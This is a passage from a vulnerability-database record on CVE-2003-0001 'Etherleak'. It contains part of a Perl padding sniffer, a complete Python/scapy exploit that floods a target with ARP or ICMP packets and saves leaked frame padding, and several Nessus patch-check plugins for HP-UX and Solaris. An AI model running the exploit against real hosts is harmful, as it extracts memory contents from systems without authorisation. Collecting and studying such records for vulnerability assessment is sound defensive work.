(!defined($pcap_save)) { \nprintf(\"Net::Pcap::dump_open failed: %s\\n\", Net::Pcap::geterr($pcap_t)); \nexit(1); \n} \n} \n \nNet::Pcap::loop($pcap_t, -1, \\&process, \"foo\"); \nNet::Pcap::close($pcap_t); \n \nif (defined($opts{'write'})) { \nNet::Pcap::dump_close($pcap_save); \n} \n \n \n \nsub process { \nmy ($user, $hdr, $pkt) = @_; \nmy ($link, $ip); \nmy $jump = 0; \n \nmy $datalink = Net::Pcap::datalink($pcap_t); \nif ($datalink == 1) { $jump += 14; } \nelsif ($datalink == 113) { $jump += 16; } \nelse { printf(\"Skipping datalink $datalink\\n\"); return; } \n \nmy $l2 = NetPacket::Ethernet->decode($pkt); \n \nif ($l2->{type} == ETH_TYPE_IP) { \n$ip = NetPacket::IP->decode(eth_strip($pkt)); \n$jump += $ip->{len}; \n} elsif ($l2->{type} == ETH_TYPE_ARP) { $jump += 28; } \nelse { \n# assume 802.3 ethernet, and just jump ahead the length \nfor ($l2->{dest_mac}) { \nif (/^0180c200/) { \n# spanning tree \n# l2->{type} here will actually be the length. HACK. \n$jump += $l2->{type}; \n} \nelsif (/^01000ccccc/) { \n# CDP/VTP/DTP/PAgP/UDLD/PVST, etc \n# l2->{type} here will actually be the length. HACK. \n$jump += $l2->{type}; \n} elsif (/^ab0000020000/) { \n# DEC-MOP-Remote-Console \nreturn; \n} else { \n# loopback \nif ($l2->{src_mac} eq $l2->{dest_mac}) { return; } \nprintf(\"Skipping datalink $datalink l2 type %s\\n\", $l2->{type}); return; \n} \n} \n} \n \n \nif ($hdr->{len} > $jump) { \nmy $trailer_bin = substr($pkt, $jump); \nmy $trailer_hex = \"\"; \nmy $trailer_ascii = \"\"; \nforeach (split(//, $trailer_bin)) { \n$trailer_hex .= sprintf(\"%02x\", ord($_)); \nif (ord($_) >= 32 && ord($_) <= 126) { \n$trailer_ascii .= $_; \n} else { $trailer_ascii .= \".\"; } \n} \n# ignore all trailers that are just single characters repeated. \n# most OS' use 0, F, 5 or a. \nunless ($trailer_hex =~ /^(0|5|f|a)\\1*$/i) { \nunless ($opts{'quiet'}) { \nprint(\"#\"x80, \"\\n\"); \nprintf(\"%s -> %s\\n\", $l2->{src_mac}, $l2->{dest_mac}); \nif ($l2->{type} == ETH_TYPE_IP) { \nprintf(\"%s -> %s\\n\", $ip->{src_ip}, $ip->{dest_ip}); \n} \n} \nprint(\"$trailer_hex\\t$trailer_ascii\\n\"); \nif (defined($opts{'write'})) { \nNet::Pcap::dump($pcap_save, $hdr, $pkt); \n} \n} \n} \n} \n \nsub usage { \nprint <<EOF; \n$0 -- A demonstration of the infamous 'etherleak' bug. \n \nCVE-2003-0001, and countless repeats of the same vulnerability. \n \nOptions: \n[-h|--help] # this message \n[-i|--interface] <interface> # interface to listen on \n[-f|--filter] <pcap filter> # apply this filter to the traffic \n[-r|--read] <path to pcap> # read from this saved pcap file \n[-w|--write] <path to pcap> # write tothis saved pcap file \n[-q|--quiet] # be quiet \n[-v|--verbose] # be verbose \n \nEOF \n \n \n} \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/55335/etherleak.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-12-05T22:19:25", "references": [], "edition": 1, "description": "", "reporter": "prdelka", "published": "2013-06-10T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "packetstorm", "title": "Cisco ASA Ethernet Information Leak", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0001"], "modified": "2013-06-10T00:00:00", "href": "https://packetstormsecurity.com/files/121969/Cisco-ASA-Ethernet-Information-Leak.html", "id": "PACKETSTORM:121969", "sourceData": "`#!/usr/bin/env python \n# CVE-2003-0001 'Etherleak' exploit \n# ================================= \n# Exploit for hosts which use a network device driver that pads \n# ethernet frames with data which vary from one packet to another, \n# likely taken from kernel memory, system memory allocated to \n# the device driver, or a hardware buffer on its network interface \n# card. Exploit uses scapy with either ICMP or ARP requests as \n# this can trigger with either but ICMP can hit layer3 filtering \n# rules. Using ARP the padding appears to leak only fixed constant \n# values when exploited, ICMP leaks random bytes. \n# \n# root@bt:~/0d# python cve-2003-0001.py x.x.x.254 icmp leaky \n# WARNING: No route found for IPv6 destination :: (no default route?) \n# [ CVE-2003-0001 'Etherleak' exploit \n# [ Attacking x.x.x.254 for icmp padding saved to leaky.hex \n# ............................................................^C!Killing \n# !Killing \n# root@bt:~/0d# hexdump -C leaky | head \n# 00000000 e6 bd a6 9b 90 eb 44 f5 18 a5 29 2a 16 5a 08 ff |......D...)*.Z..| \n# 00000010 43 e1 23 07 8f 96 5a 24 3f 3d 33 7d b4 97 7e 18 |C.#...Z$?=3}..~.| \n# 00000020 05 c9 7c 2c a5 c0 fa 7a 76 f3 51 c0 fe 07 72 32 |..|,...zv.Q...r2| \n# 00000030 9e ad 6a 67 ad 43 58 17 60 43 bc 2b b8 fb cc 70 |..jg.CX.`C.+...p| \n# 00000040 99 92 80 84 03 03 6f 8f 18 d3 5b 5e f0 1e 3a 83 |......o...[^..:.| \n# 00000050 3d 82 e7 cd 3e 1f 31 74 b0 06 8c a2 7e 14 6b fb |=...>.1t....~.k.| \n# 00000060 72 9b ac 64 74 9b a4 d9 23 5b 92 82 0d 0b 31 f0 |r..dt...#[....1.| \n# 00000070 a9 4f dd 3f bf 2b 5c 67 6c 22 fa da d0 2b d6 39 |.O.?.+\\gl\"...+.9| \n# 00000080 40 58 13 4f 3d bb 48 03 d3 53 3c 5c 44 d2 3d b2 |@X.O=.H..S<\\D.=.| \n# 00000090 4f f2 a9 4a 02 80 4e 1b 6c bd 69 89 bd 76 1b 0a |O..J..N.l.i..v..| \n# \n# This issue has been resolved in ASA 8.4.4.6/8.2.5.32. Cisco Bug reference \n# is CSCua88376 and PSIRT-0669464365. \n# \n# -- prdelka \n# \nimport os \nimport sys \nimport signal \nimport binascii \nfrom scapy.all import * \n \ndef signalhandler(signal,id): \nprint \"!Killing\" \nsys.exit(0) \n \ndef spawn(host,type): \nif type == 'arp': \nsend(ARP(pdst=host),loop=1,nofilter=1) \nelif type == 'icmp': \nsend(IP(dst=host)/ICMP(type=8)/'x',loop=1,nofilter=1) \n \nif __name__ == \"__main__\": \nprint \"[ CVE-2003-0001 'Etherleak' exploit\" \nsignal.signal(signal.SIGINT,signalhandler) \nif len(sys.argv) < 4: \nprint \"[ No! Use with <host> <arp|icmp> <file>\" \nsys.exit(1) \ntype = sys.argv[2] \nif type == 'arp': \npass \nelif type == 'icmp': \npass \nelse: \nprint \"Bad type!\" \nsys.exit(0) \npid = os.fork() \nif(pid): \nprint \"[ Attacking %s for %s padding saved to %s.hex\" % (sys.argv[1],sys.argv[2],sys.argv[3]) \nspawn(sys.argv[1],sys.argv[2]) \nwhile True: \nif type == 'arp': \nmyfilter = \"host %s and arp\" % sys.argv[1] \nelif type == 'icmp': \nmyfilter = \"host %s and icmp\" % sys.argv[1] \nx = sniff(count=1,filter=myfilter,lfilter=lambda x: x.haslayer(Padding)) \np = x[0] \nif type == 'arp': \npad = p.getlayer(2) \nif type == 'icmp': \npad = p.getlayer(4) \nleak = str(pad) \nhexfull = binascii.b2a_hex(leak) \nfile = \"%s.hex\"%sys.argv[3] \nfdesc = open(file,\"a\") \nfdesc.write(hexfull + \"\\n\") \nfdesc.close() \n# 32 bits leaked here for me. \nif type == 'icmp': \nbytes = leak[9:13] \nelif type == 'arp': \nbytes = leak[10:14] \nfdesc = open(sys.argv[3],\"ab\") \nfdesc.write(bytes) \nfdesc.close() \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/121969/ciscoasa-leak.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "nessus": [{"lastseen": "2018-09-01T23:38:50", "references": ["https://getupdates.oracle.com/readme/125907-02"], "pluginID": "69906", "description": "Vulnerability in the Solaris component of Oracle Sun Systems Products Suite (subcomponent: AMD pcnet driver). Supported versions that are affected are 10 and 11. Easily exploitable vulnerability allows successful unauthenticated network attacks via TCP/IP. Successful attack of this vulnerability can result in unauthorized read access to a subset of Solaris accessible data.\n\nThis plugin has been deprecated and either replaced with individual 125907 patch-revision plugins, or deemed non-security related.", "edition": 6, "reporter": "Tenable", "published": "2013-09-15T00:00:00", "title": "Solaris 10 (x86) : 125907-02 (deprecated)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Solaris Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0001"], "modified": "2018-07-30T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS10_X86_125907.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=69906", "sourceData": "\n#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2018/03/12. Deprecated and either replaced by\n# individual patch-revision plugins, or has been deemed a\n# non-security advisory.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69906);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/07/30 13:40:14\");\n\n script_cve_id(\"CVE-2003-0001\");\n\n script_name(english:\"Solaris 10 (x86) : 125907-02 (deprecated)\");\n script_summary(english:\"Check for patch 125907-02\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"This plugin has been deprecated.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Vulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: AMD pcnet driver). Supported versions that are\naffected are 10 and 11. Easily exploitable vulnerability allows\nsuccessful unauthenticated network attacks via TCP/IP. Successful\nattack of this vulnerability can result in unauthorized read access to\na subset of Solaris accessible data.\n\nThis plugin has been deprecated and either replaced with individual\n125907 patch-revision plugins, or deemed non-security related.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/125907-02\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"n/a\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated. Consult specific patch-revision plugins for patch 125907 instead.\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-01T23:49:48", "references": [], "pluginID": "17420", "description": "s700_800 11.04 (VVOS) LAN product cumulative patch : \n\nPotential for Ethernet device drivers to reuse packet data for padding. Cross-reference: CERT/cc VU#412115 and CVE CAN-2003-0001.", "edition": 4, "reporter": "Tenable", "published": "2005-03-18T00:00:00", "title": "HP-UX PHNE_29267 : HPSBUX0305-261 SSRT3451 Potential Security Vulnerability in HP-UX network drivers (Data Leakage) (rev. 01)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "HP-UX Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0001"], "modified": "2013-04-20T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHNE_29267.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=17420", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHNE_29267. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(17420);\n script_version(\"$Revision: 1.13 $\");\n script_cvs_date(\"$Date: 2013/04/20 00:36:48 $\");\n\n script_cve_id(\"CVE-2003-0001\");\n script_xref(name:\"CERT\", value:\"412115\");\n script_xref(name:\"HP\", value:\"HPSBUX0305\");\n script_xref(name:\"HP\", value:\"SSRT3451\");\n\n script_name(english:\"HP-UX PHNE_29267 : HPSBUX0305-261 SSRT3451 Potential Security Vulnerability in HP-UX network drivers (Data Leakage) (rev. 01)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.04 (VVOS) LAN product cumulative patch : \n\nPotential for Ethernet device drivers to reuse packet data for\npadding. Cross-reference: CERT/cc VU#412115 and CVE CAN-2003-0001.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHNE_29267 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/03/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2013 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.04\"))\n{\n exit(0, \"The host is not affected since PHNE_29267 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHNE_29267\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"Networking.LAN-RUN\", version:\"B.11.04\")) flag++;\nif (hpux_check_patch(app:\"Networking.LAN2-KRN\", version:\"B.11.04\")) flag++;\nif (hpux_check_patch(app:\"Networking.NW-ENG-A-MAN\", version:\"B.11.04\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-01T23:42:09", "references": [], "pluginID": "16926", "description": "s700_800 11.04 (VVOS) EISA 100BT cumulative patch : \n\nPotential for Ethernet device drivers to reuse packet data for padding. Cross-reference: CERT/cc VU#412115 and CVE CAN-2003-0001.", "edition": 4, "reporter": "Tenable", "published": "2005-02-16T00:00:00", "title": "HP-UX PHNE_29244 : HPSBUX0305-261 SSRT3451 Potential Security Vulnerability in HP-UX network drivers (Data Leakage) (rev. 01)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "HP-UX Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0001"], "modified": "2013-04-20T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHNE_29244.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=16926", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHNE_29244. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(16926);\n script_version(\"$Revision: 1.13 $\");\n script_cvs_date(\"$Date: 2013/04/20 00:36:48 $\");\n\n script_cve_id(\"CVE-2003-0001\");\n script_xref(name:\"CERT\", value:\"412115\");\n script_xref(name:\"HP\", value:\"HPSBUX0305\");\n script_xref(name:\"HP\", value:\"SSRT3451\");\n\n script_name(english:\"HP-UX PHNE_29244 : HPSBUX0305-261 SSRT3451 Potential Security Vulnerability in HP-UX network drivers (Data Leakage) (rev. 01)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.04 (VVOS) EISA 100BT cumulative patch : \n\nPotential for Ethernet device drivers to reuse packet data for\npadding. Cross-reference: CERT/cc VU#412115 and CVE CAN-2003-0001.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHNE_29244 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/02/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2013 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.04\"))\n{\n exit(0, \"The host is not affected since PHNE_29244 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHNE_29244\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"100BT-EISA-FMT.100BT-FORMAT\", version:\"B.11.04.01\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-FMT.100BT-FORMAT\", version:\"B.11.04.02\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-FMT.100BT-FORMAT\", version:\"B.11.04.03\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-FMT.100BT-FORMAT\", version:\"B.11.04.04\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-KRN.100BT-KRN\", version:\"B.11.04.01\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-KRN.100BT-KRN\", version:\"B.11.04.02\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-KRN.100BT-KRN\", version:\"B.11.04.03\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-KRN.100BT-KRN\", version:\"B.11.04.04\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-INIT\", version:\"B.11.04.01\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-INIT\", version:\"B.11.04.02\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-INIT\", version:\"B.11.04.03\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-INIT\", version:\"B.11.04.04\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-RUN\", version:\"B.11.04.01\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-RUN\", version:\"B.11.04.02\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-RUN\", version:\"B.11.04.03\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-RUN\", version:\"B.11.04.04\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-10-31T12:33:16", "references": ["https://getupdates.oracle.com/readme/125907-02"], "pluginID": "107944", "description": "Vulnerability in the Solaris component of Oracle Sun Systems Products Suite (subcomponent: AMD pcnet driver). Supported versions that are affected are 10 and 11. Easily exploitable vulnerability allows successful unauthenticated network attacks via TCP/IP. Successful attack of this vulnerability can result in unauthorized read access to a subset of Solaris accessible data.", "edition": 4, "reporter": "Tenable", "published": "2018-03-12T00:00:00", "title": "Solaris 10 (x86) : 125907-02", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "naslFamily": "Solaris Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0001"], "modified": "2018-10-29T00:00:00", "cpe": ["cpe:/o:oracle:solaris:10", "p-cpe:/a:oracle:solaris:10:125907"], "id": "SOLARIS10_X86_125907-02.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=107944", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(107944);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2018/10/29 10:22:58\");\n\n script_cve_id(\"CVE-2003-0001\");\n\n script_name(english:\"Solaris 10 (x86) : 125907-02\");\n script_summary(english:\"Check for patch 125907-02\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 125907-02\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: AMD pcnet driver). Supported versions that are\naffected are 10 and 11. Easily exploitable vulnerability allows\nsuccessful unauthenticated network attacks via TCP/IP. Successful\nattack of this vulnerability can result in unauthorized read access to\na subset of Solaris accessible data.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/125907-02\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 125907-02\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:125907\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"i386\") audit(AUDIT_ARCH_NOT, \"i386\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"125907-02\", obsoleted_by:\"\", package:\"SUNWos86r\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWos86r\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-01T23:33:13", "references": [], "pluginID": "16670", "description": "s700_800 11.00 LAN product cumulative patch : \n\nPotential for Ethernet device drivers to reuse packet data for padding. Cross-reference: CERT/cc VU#412115 and CVE CAN-2003-0001.", "edition": 4, "reporter": "Tenable", "published": "2005-02-16T00:00:00", "title": "HP-UX PHNE_28143 : HPSBUX0305-261 SSRT3451 Potential Security Vulnerability in HP-UX network drivers (Data Leakage) (rev. 01)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "HP-UX Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0001"], "modified": "2013-04-20T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHNE_28143.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=16670", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHNE_28143. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(16670);\n script_version(\"$Revision: 1.13 $\");\n script_cvs_date(\"$Date: 2013/04/20 00:36:48 $\");\n\n script_cve_id(\"CVE-2003-0001\");\n script_xref(name:\"CERT\", value:\"412115\");\n script_xref(name:\"HP\", value:\"HPSBUX0305\");\n script_xref(name:\"HP\", value:\"SSRT3451\");\n\n script_name(english:\"HP-UX PHNE_28143 : HPSBUX0305-261 SSRT3451 Potential Security Vulnerability in HP-UX network drivers (Data Leakage) (rev. 01)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.00 LAN product cumulative patch : \n\nPotential for Ethernet device drivers to reuse packet data for\npadding. Cross-reference: CERT/cc VU#412115 and CVE CAN-2003-0001.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHNE_28143 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/02/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2013 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.00\"))\n{\n exit(0, \"The host is not affected since PHNE_28143 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHNE_28143\", \"PHNE_29530\", \"PHNE_32643\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"Networking.LAN-RUN\", version:\"B.11.00\")) flag++;\nif (hpux_check_patch(app:\"Networking.LAN2-KRN\", version:\"B.11.00\")) 